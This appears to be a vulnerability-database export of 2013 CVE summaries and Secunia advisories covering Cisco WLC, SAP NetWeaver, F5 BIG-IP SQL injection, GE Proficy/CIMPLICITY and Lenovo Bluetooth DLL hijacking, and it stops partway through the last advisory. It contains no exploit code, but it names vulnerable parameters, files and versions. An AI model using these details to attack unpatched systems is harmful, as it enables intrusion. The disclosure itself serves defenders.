VARIoT IoT vulnerabilities database

The HTTP Profiling functionality on Cisco Wireless LAN Controller (WLC) devices with software 7.3.101.0 allows remote authenticated users to execute arbitrary code via a crafted HTTP User-Agent header, aka Bug ID CSCuc15636. The Cisco Wireless LAN Controller is responsible for system-wide wireless LAN functions such as security policy, intrusion protection, RF management, quality of service, and mobility. Cisco Wireless LAN Controllers fail to properly filter user-supplied input, allowing authenticated remote attackers to send specially crafted UserAgent strings over wired or wireless segments. The software handles specially crafted strings allowing an attacker to execute arbitrary code on the system. Other attacks may also be possible. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Cisco Wireless LAN Controllers Multiple Vulnerabilities SECUNIA ADVISORY ID: SA51965 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51965/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51965 RELEASE DATE: 2013-01-24 DISCUSS ADVISORY: http://secunia.com/advisories/51965/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51965/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51965 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Cisco Wireless Lan Controllers, which can be exploited by malicious users to bypass certain security restrictions and compromise a vulnerable system and by malicious people to cause a DoS (Denial of Service). 1) An error within the wIPS component when handling certain IP packets can be exploited to cause a reload. Successful exploitation requires that Cisco WLCs are configured with Wireless Intrusion Prevention System (wIPS). 2) An error when handling certain Session Initiation Protocol (SIP) packets can be exploited to cause a reload. 4) An error when handling access restrictions can be exploited to view or modify sensitive information such as configuration files. The vulnerabilities are reported in the following products: * Cisco 2000 Series WLC * Cisco 2100 Series WLC * Cisco 2500 Series WLC * Cisco 4100 Series WLC * Cisco 4400 Series WLC * Cisco 5500 Series WLC * Cisco 7500 Series WLC * Cisco 8500 Series WLC * Cisco 500 Series Wireless Express Mobility Controllers * Cisco Wireless Services Module (Cisco WiSM) * Cisco Wireless Services Module version 2 (Cisco WiSM version 2) * Cisco NME-AIR-WLC Module for Integrated Services Routers (ISRs) * Cisco NM-AIR-WLC Module for Integrated Services Routers (ISRs) * Cisco Catalyst 3750G Integrated WLCs * Cisco Flex 7500 Series Cloud Controller * Cisco Virtual Wireless Controller * Cisco Wireless Controller Software for Integrated Services Module 300 and Cisco Services-Ready Engine 700, 710, 900, and 910 SOLUTION: Apply update (please see the vendor's advisory for details). PROVIDED AND/OR DISCOVERED BY: #1, #2, #3) Reported by the vendor. #4) The vendor credits Darren Johnson. ORIGINAL ADVISORY: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130123-wlc OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.3, 7.1 and 7.2 before 7.2.111.3, and 7.3 before 7.3.101.0 allow remote authenticated users to bypass wireless-management settings and read or modify the device configuration via an SNMP request, aka Bug ID CSCua60653. The Cisco Wireless LAN Controller is responsible for system-wide wireless LAN functions such as security policy, intrusion protection, RF management, quality of service, and mobility. Exploiting these issues could allow an attacker to deny service to legitimate users, execute arbitrary code, or gain unauthorized access. Other attacks may also be possible. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Cisco Wireless LAN Controllers Multiple Vulnerabilities SECUNIA ADVISORY ID: SA51965 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51965/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51965 RELEASE DATE: 2013-01-24 DISCUSS ADVISORY: http://secunia.com/advisories/51965/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51965/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51965 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Cisco Wireless Lan Controllers, which can be exploited by malicious users to bypass certain security restrictions and compromise a vulnerable system and by malicious people to cause a DoS (Denial of Service). 1) An error within the wIPS component when handling certain IP packets can be exploited to cause a reload. Successful exploitation requires that Cisco WLCs are configured with Wireless Intrusion Prevention System (wIPS). 2) An error when handling certain Session Initiation Protocol (SIP) packets can be exploited to cause a reload. 3) An input sanitisation error can be exploited to execute arbitrary code by sending a specially crafted UserAgent string. 4) An error when handling access restrictions can be exploited to view or modify sensitive information such as configuration files. The vulnerabilities are reported in the following products: * Cisco 2000 Series WLC * Cisco 2100 Series WLC * Cisco 2500 Series WLC * Cisco 4100 Series WLC * Cisco 4400 Series WLC * Cisco 5500 Series WLC * Cisco 7500 Series WLC * Cisco 8500 Series WLC * Cisco 500 Series Wireless Express Mobility Controllers * Cisco Wireless Services Module (Cisco WiSM) * Cisco Wireless Services Module version 2 (Cisco WiSM version 2) * Cisco NME-AIR-WLC Module for Integrated Services Routers (ISRs) * Cisco NM-AIR-WLC Module for Integrated Services Routers (ISRs) * Cisco Catalyst 3750G Integrated WLCs * Cisco Flex 7500 Series Cloud Controller * Cisco Virtual Wireless Controller * Cisco Wireless Controller Software for Integrated Services Module 300 and Cisco Services-Ready Engine 700, 710, 900, and 910 SOLUTION: Apply update (please see the vendor's advisory for details). PROVIDED AND/OR DISCOVERED BY: #1, #2, #3) Reported by the vendor. #4) The vendor credits Darren Johnson. ORIGINAL ADVISORY: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130123-wlc OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP NetWeaver SDM service has an unspecified error that allows an attacker to exploit a vulnerability to bypass authentication and perform restricted operations. SAP NetWeaver is prone to multiple security vulnerabilities. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: SAP NetWeaver SDM Multiple Vulnerabilities SECUNIA ADVISORY ID: SA51740 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51740/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51740 RELEASE DATE: 2013-01-23 DISCUSS ADVISORY: http://secunia.com/advisories/51740/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51740/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51740 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: ERPScan has reported multiple vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to disclose certain sensitive information, bypass certain security restrictions, and cause a DoS (Denial of Service). SOLUTION: Apply SAP Note 1724516. PROVIDED AND/OR DISCOVERED BY: Alexander Polyakov, ERPScan. ORIGINAL ADVISORY: SAP: https://service.sap.com/sap/support/notes/1724516 ERPScan (DSECRG-12-044, DSECRG-12-045, DSECRG-12-046, DSECRG-12-047, DSECRG-12-048): http://erpscan.com/advisories/dsecrg-12-044-sap-netweaver-sdm-authentication-bypass/ http://erpscan.com/advisories/dsecrg-12-045-sap-netweaver-sdm-denial-of-service/ http://erpscan.com/advisories/dsecrg-12-046-sap-netweaver-sdm-information-disclosure-and-smbrelay/ http://erpscan.com/advisories/dsecrg-12-047-sap-netweaver-sdm-admin-information-disclosure/ http://erpscan.com/advisories/dsecrg-12-048-sap-netweaver-sdm-admin-dos/ OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Multiple SQL injection vulnerabilities in sam/admin/reports/php/saveSettings.php in the (1) APM WebGUI in F5 BIG-IP LTM, GTM, ASM, Link Controller, PSM, APM, Edge Gateway, and Analytics and (2) AVR WebGUI in WebAccelerator and WOM 11.2.x before 11.2.0-HF3 and 11.2.x before 11.2.1-HF3 allow remote authenticated users to execute arbitrary SQL commands via the defaultQuery parameter. F5 BIG-IP is an application switch. F5 BIG-IP saveSettings.php fails to properly filter user-submitted input. An authenticated attacker can exploit a vulnerability to submit a malicious SQL query that can access MySQL database information or access system files in the \"mysql\" OS user context. To successfully exploit a vulnerability, you may need to enable Application Security (ASM) or Access Policy (APM). Versions prior to F5 BIG-IP 11.2.0 are vulnerable. F5 BIG-IP LTM, etc. are all products of F5 Company in the United States. LTM is a local traffic manager; GTM is a wide area traffic manager; WebAccelerator is an application accelerator. The vulnerability is caused by the sam/admin/reports/php/saveSettings.php script not adequately filtering the 'defaultQuery' parameter. A remote attacker can exploit this vulnerability to execute arbitrary SQL commands. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: F5 Products "defaultQuery" SQL Injection Vulnerability SECUNIA ADVISORY ID: SA51867 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51867/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51867 RELEASE DATE: 2013-01-25 DISCUSS ADVISORY: http://secunia.com/advisories/51867/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51867/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51867 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: SEC Consult has reported a vulnerability in F5 Products, which can be exploited by malicious users to conduct SQL injection attacks. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The vulnerability is reported in the following products: * BIG-IP LTM version 11.x * BIG-IP GTM version 11.x * BIG-IP ASM version 11.x * BIG-IP Link Controller version 11.x * BIG-IP PSM version 11.x * BIG-IP APM version 11.x * BIG-IP Edge Gateway version 11.x * BIG-IP Analytics version 11.x SOLUTION: Update to a fixed version (Please see vendor's advisory for details). PROVIDED AND/OR DISCOVERED BY: Stefan Viehb\xf6ck, SEC Consult. ORIGINAL ADVISORY: sol14154: http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14154.html SEC Consult: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130122-1_F5_BIG-IP_SQL_Injection_v10.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The Portal installation process in GE Intelligent Platforms Proficy Real-Time Information Portal stores sensitive information under the web root with insufficient access control, which allows remote attackers to read configuration files, and discover data-source credentials, via a direct request. GE Proficy Real-Time Information Portal is a Proficy real-time information portal, a real-time manufacturing intelligence application for GE Intelligent Platforms. Attackers can exploit these issues to gain access to sensitive information that may aid in further attacks. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Proficy Real-Time Information Portal Two Information Disclosure Security Issues SECUNIA ADVISORY ID: SA51746 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51746/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51746 RELEASE DATE: 2013-01-23 DISCUSS ADVISORY: http://secunia.com/advisories/51746/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51746/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51746 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two security issues have been reported in Proficy Real-Time Information Portal, which can be exploited by malicious people to disclose certain sensitive information. 1) The application provides unrestricted access to certain files and directories, which can be exploited to e.g. retrieve configuration files. 2) The application exposes certain methods via Java RMI, which can be exploited to disclose information via RMI call. The security issues are reported in all supported versions. SOLUTION: Apply updates (please see the vendor's advisory for details). Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: ICSA-13-022-01: http://www.us-cert.gov/control_systems/pdf/ICSA-13-022-01.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

GE Intelligent Platforms Proficy Real-Time Information Portal does not restrict access to methods of an unspecified Java class, which allows remote attackers to obtain a username listing via an RMI call. Attackers can exploit these issues to gain access to sensitive information that may aid in further attacks. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Proficy Real-Time Information Portal Two Information Disclosure Security Issues SECUNIA ADVISORY ID: SA51746 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51746/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51746 RELEASE DATE: 2013-01-23 DISCUSS ADVISORY: http://secunia.com/advisories/51746/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51746/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51746 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two security issues have been reported in Proficy Real-Time Information Portal, which can be exploited by malicious people to disclose certain sensitive information. 1) The application provides unrestricted access to certain files and directories, which can be exploited to e.g. retrieve configuration files. The security issues are reported in all supported versions. SOLUTION: Apply updates (please see the vendor's advisory for details). Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: ICSA-13-022-01: http://www.us-cert.gov/control_systems/pdf/ICSA-13-022-01.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Directory traversal vulnerability in substitute.bcl in the WebView CimWeb subsystem in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY 4.01 through 8.0, and Proficy Process Systems with CIMPLICITY, allows remote attackers to read arbitrary files via a crafted packet. GE Intelligent Platforms is a software and hardware product, service and expertise for users in the field of automation control and embedded. GE Proficy CIMPLICITY is the PC configuration software. GE Proficy CIMPLICITY WebView CimWeb component (substitute.bcl) does not properly check input variables and send malicious packets to TCP port 80. Attackers can view and download files on the server through directory traversal attacks. The CIMPLICITY component is prone to a directory-traversal vulnerability and a remote command-execution vulnerability because it fails to properly validate user-supplied data. Failed exploit attempts will result in a denial-of-service condition. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: GE Intelligent Platforms Products Two Vulnerabilities SECUNIA ADVISORY ID: SA51936 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51936/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51936 RELEASE DATE: 2013-01-24 DISCUSS ADVISORY: http://secunia.com/advisories/51936/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51936/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51936 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in GE Intelligent Platforms products, which can be exploited by malicious users to disclose certain sensitive information and compromise a vulnerable system. 2) An unspecified error exists in CimWebServer when processing packets and can be exploited to e.g. run arbitrary commands by sending a specially-crafted packet. NOTE: CIMPLICITY built-in Web server component is not enabled by default. The vulnerabilities are reported in the following products: * Proficy HMI/SCADA \x96 CIMPLICITY version 4.01 and greater * Proficy Process Systems with CIMPLICITY SOLUTION: Apply updates (please see the vendor's advisory for details). Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: ICSA-13-022-02: http://www.us-cert.gov/control_systems/pdf/ICSA-13-022-02.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

CimWebServer in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY 4.01 through 8.0, and Proficy Process Systems with CIMPLICITY, allows remote attackers to execute arbitrary commands or cause a denial of service (daemon crash) via a crafted packet. GE Intelligent Platforms is a software and hardware product, service and expertise for users in the field of automation control and embedded. GE Proficy CIMPLICITY is the PC configuration software. The CIMPLICITY component is prone to a directory-traversal vulnerability and a remote command-execution vulnerability because it fails to properly validate user-supplied data. Failed exploit attempts will result in a denial-of-service condition. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: GE Intelligent Platforms Products Two Vulnerabilities SECUNIA ADVISORY ID: SA51936 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51936/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51936 RELEASE DATE: 2013-01-24 DISCUSS ADVISORY: http://secunia.com/advisories/51936/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51936/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51936 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in GE Intelligent Platforms products, which can be exploited by malicious users to disclose certain sensitive information and compromise a vulnerable system. 1) An unspecified error exists within the WebView CimWeb component (substitute.bcl) and can be exploited to disclose arbitrary files via directory traversal attacks. 2) An unspecified error exists in CimWebServer when processing packets and can be exploited to e.g. run arbitrary commands by sending a specially-crafted packet. NOTE: CIMPLICITY built-in Web server component is not enabled by default. The vulnerabilities are reported in the following products: * Proficy HMI/SCADA \x96 CIMPLICITY version 4.01 and greater * Proficy Process Systems with CIMPLICITY SOLUTION: Apply updates (please see the vendor's advisory for details). Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: ICSA-13-022-02: http://www.us-cert.gov/control_systems/pdf/ICSA-13-022-02.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Untrusted search path vulnerability in Lenovo Thinkpad Bluetooth with Enhanced Data Rate Software 6.4.0.2900 and earlier allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse DLL that is located in the same folder as a file that is processed by Lenovo Bluetooth. Supplementary information : CWE Vulnerability type by CWE-426: Untrusted Search Path ( Unreliable search path ) Has been identified. Attackers can exploit this vulnerability to execute arbitrary code in the context of the user running the vulnerable application. Bluetooth with Enhanced Data Rate Software 6.4.0.2900 is vulnerable; other versions may also be affected. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Lenovo Bluetooth with Enhanced Data Rate Software Insecure Library Loading Vulnerability SECUNIA ADVISORY ID: SA51846 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51846/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51846 RELEASE DATE: 2013-01-22 DISCUSS ADVISORY: 